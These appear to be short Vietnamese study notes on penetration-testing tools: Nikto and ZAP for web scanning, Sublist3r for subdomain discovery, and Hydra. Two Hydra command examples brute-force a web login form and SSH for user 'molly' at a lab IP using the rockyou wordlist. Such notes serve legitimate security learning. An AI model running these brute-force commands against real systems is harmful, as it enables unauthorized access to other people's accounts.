Hai cái tool là Nikto và Zap.
Cả hai đều sử dụng để tìm kiểm những điểm yếu trang web.

Sublist3r: tìm ra các subdomain dựa vào các công cụ tìm kiếm như bing, gg, baidu,…
Ngoài ra có một trang web để làm công việc tương tự

Hydra
Là một cái tool để brute force password một số dịch vụ như ftp,ssh,webapp form,…

VD1: web app form
hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.229.24 http-post-form "/login:username=^USER^&password=^PASS^:Your username or password is incorrect." -V

VD2: ssh
hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.229.24 -t 4 ssh